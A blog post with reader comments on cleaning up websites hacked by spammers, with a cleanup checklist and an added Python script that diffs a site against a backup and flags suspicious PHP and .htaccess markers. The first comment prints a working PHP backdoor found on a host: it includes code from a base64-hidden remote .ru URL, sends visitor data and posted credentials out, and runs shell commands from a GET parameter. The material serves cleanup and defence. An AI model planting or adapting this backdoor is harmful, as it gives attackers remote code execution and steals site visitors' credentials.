Fixing hacked sites

There’s been a lot of hacked sites lately. Sites hacked by or for spammers, who use other people’s websites to serve up their spammy content.

The websites may have been hacked using many different techniques, so I won’t get into ways they could have been hacked here.

However, I’ll cover what you need to do. Maybe others can suggest other things you should do as well (in the comments).

First of all, look over the site. Look for php files that shouldn’t be there. It’s helpful to have a fairly recent backup to compare with. Download and save (via ftp or a control panel or file explorer) the php files you don’t recognize. I’d love to see samples of the php files too, in order to track the spammers through the code, if you’re OK with that.
Notify your webhost. Ask them whether the hackers have used a hack that compromised other websites. Some hacks are “per site”, others are per server.

There are different techniques used by spammers when they hack sites. Some use php files, some use ordinary html files. Download and save any files uploaded by spammers, then remove them. Also be aware that one site owner reported that the spammers had deleted several thousand images to make room for their spammy files.

Erase ALL files from the website, if possible. If not, remove the files you don’t recognize. Reload files from a backup. Leave the databases as is. We haven’t seen any cases of altered databases so far. If you use php scripts on your site, be sure to upgrade to the newest version while restoring the site. Old php scripts may have gotten you hacked. Also review any problematic security settings on your host, pertaining to your scripts.
Check the .htaccess file for code that shouldn’t be there. Here’s one example for reference.

Change all passwords.

Download raw logs and store if possible.
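The checklist above boils down to comparing the live site against a clean backup and looking for php files and .htaccess entries that shouldn’t be there. The script below is an added example, not part of the original post, that does that comparison over two local directories (a clean backup and a fresh download of the live site) and then scans every added or changed file for the kind of markers that appear in the backdoor sample quoted in the comments (error suppression, base64_decode, a remote include, shell execution). The directory layout, the marker lists, the `build_demo` sample data and the .htaccess directives it flags are assumptions made for the example; the post itself does not list them.

```python
"""Compare a live-site download against a clean backup and flag files worth a look.

Added example (not code from the original post).  Paths, marker lists and the
demo data are assumptions.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Markers of the kind seen in the backdoor sample quoted in the comments:
# error suppression, base64-obscured strings, remote includes, shell execution,
# and request-controlled input.  Heuristics, not a complete signature set.
PHP_MARKERS = {
    "error_suppression": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "base64_decode": re.compile(r"base64_decode\s*\("),
    "remote_include": re.compile(r"include(?:_once)?\s*\(?\s*(?:base64_decode\s*\(|['\"]https?://)"),
    "shell_function": re.compile(r"\b(?:system|exec|shell_exec|passthru|eval)\s*\("),
    "backtick_exec": re.compile(r"`[^`\n]+`"),
    "request_controlled": re.compile(r"\$_(?:GET|POST|REQUEST)\s*\["),
}

# Apache directives that commonly turn up in a tampered .htaccess
# (assumed heuristics, not taken from the post).
HTACCESS_MARKERS = {
    "external_rewrite": re.compile(r"^\s*RewriteRule\b.*\bhttps?://", re.I | re.M),
    "php_handler_on_other_ext": re.compile(r"^\s*Add(?:Handler|Type)\b.*php", re.I | re.M),
    "auto_prepend": re.compile(r"auto_(?:prepend|append)_file", re.I),
}


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def tree_digests(root: Path) -> dict:
    """Map each regular file under root (relative POSIX path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_trees(backup_root: Path, live_root: Path) -> dict:
    """Files added, modified and removed on the live site relative to the backup."""
    backup, live = tree_digests(backup_root), tree_digests(live_root)
    return {
        "added": sorted(set(live) - set(backup)),
        "removed": sorted(set(backup) - set(live)),
        "modified": sorted(p for p in set(live) & set(backup) if live[p] != backup[p]),
    }


def scan_text(text: str, markers: dict) -> list:
    """Names of the markers that match the given file content, sorted."""
    return sorted(name for name, rx in markers.items() if rx.search(text))


def markers_for(path: Path) -> dict:
    if path.name == ".htaccess":
        return HTACCESS_MARKERS
    if path.suffix.lower() in {".php", ".phtml", ".html", ".htm"}:
        return PHP_MARKERS          # spammers use plain html files too
    return {}


def triage(backup_root: Path, live_root: Path) -> dict:
    """Diff the two trees, then scan every added or modified file for markers.

    Returns {"diff": {...}, "flagged": {relpath: [marker, ...]}}.  A file that
    differs but matches no marker still appears in "diff" and needs a manual look.
    """
    diff = compare_trees(backup_root, live_root)
    flagged = {}
    for rel in diff["added"] + diff["modified"]:
        path = live_root / rel
        markers = markers_for(path)
        if not markers:
            continue
        hits = scan_text(path.read_text(errors="replace"), markers)
        if hits:
            flagged[rel] = hits
    return {"diff": diff, "flagged": flagged}


def build_demo(base: Path) -> tuple:
    """Construct a tiny backup/live pair for a dry run (sample data, not a real site)."""
    backup, live = base / "backup", base / "live"
    for root in (backup, live):
        (root / "img").mkdir(parents=True, exist_ok=True)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / ".htaccess").write_text("Options -Indexes\n")
    (backup / "img" / "logo.gif").write_bytes(b"GIF89a")   # deleted on live, as one owner reported
    (live / "date.php").write_text(                          # dropped-in file with sample-style markers
        '<?php\nerror_reporting(0);\n$u = base64_decode("aGVsbG8=");\nprint `uname -a`;\n?>\n')
    (live / ".htaccess").write_text(                         # tampered: another extension mapped to php
        "Options -Indexes\nAddHandler application/x-httpd-php .gif\n")
    return backup, live


def demo_report() -> dict:
    """Run triage over the constructed sample pair and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = build_demo(Path(tmp))
        return triage(backup, live)


if __name__ == "__main__":
    report = demo_report()
    for rel, hits in report["flagged"].items():
        print(f"{rel}: {', '.join(hits)}")
    print("removed:", report["diff"]["removed"])
```

Run it without arguments to see the demo; for a real cleanup, point `triage()` at the backup directory and at a fresh download of the live site. Save a copy of anything it flags before removing it (the post asks for samples), and treat files that differ from the backup but match no marker as still needing a manual read.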

7 Responses to “Fixing hacked sites”

  1. evariste says:

    Here’s an example that showed up on a Hosting Matters server, a couple of months ago. The filename is “common.php”, but there were hundreds of these, named things like “date.php” and “time.php”.


    <?php
    error_reporting(0);   // hide all PHP errors so the file fails silently
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    // the base64 string hides the controller URL; the visitor's IP, the requested URL and any
    // posted credentials are appended, and whatever the remote host returns is included as PHP
    // (REMOTE_ADDR and REQUEST_URI are bare, unquoted constants in the sample as posted)
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        // fallback when the remote include fails: shell command from a GET parameter
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

  2. evariste says:

    (it decodes to something.ru, I can’t remember. Anyway, been following your blog on and off for a while, you do good work, Spamhuntress!)

  3. kay says:

    girl u don't know what you r talking about. have u heard about XSS?

    how about MySQL Injection.

    “We haven’t seen any cases of altered databases so far.”
    I did and used to do it.

  4. Joe says:

    XSS or MySQL Injection are ways to insert bad code into a database, but this post is talking about what things are commonly affected when your server is compromised based on recent attacks. It appears databases are not being attacked in this way so far. But I would still much prefer to restore a backup of the database if possible.

  5. Read this horror story about an entire Large firm’s Website being Hacked and Banned without them even knowing about it

    seroundtable.com/archives/006534.html :-o

    if you look at the screenshot on the Google SERPs archive - you will notice many (dot)DHTML extensions

    Does anyone think this could have been done by competitors - is this a trend?

  6. vilandas says:

    HEY MY BUDDY HIS SITE GOT HACKED AND ALL OF THE FORUMS ARE GONE IS THERE ANYWAY TO GET THAT BACK AND TO CATCH THE HACKERS

  7. admin says:

    Vilandas: Most forums have databases that hold the actual posts. So if the database is intact, then he can get the forums back. The first thing you do is try to back up the forum. Then clean up the mess left by the hackers, and figure out how they got in. Finally install a new version of the forum (up-to-date software has fewer vulnerabilities). He’ll need the password for the forum and a few other details. If he doesn’t have that, he’d need to ask the webhost for help in getting a new password.
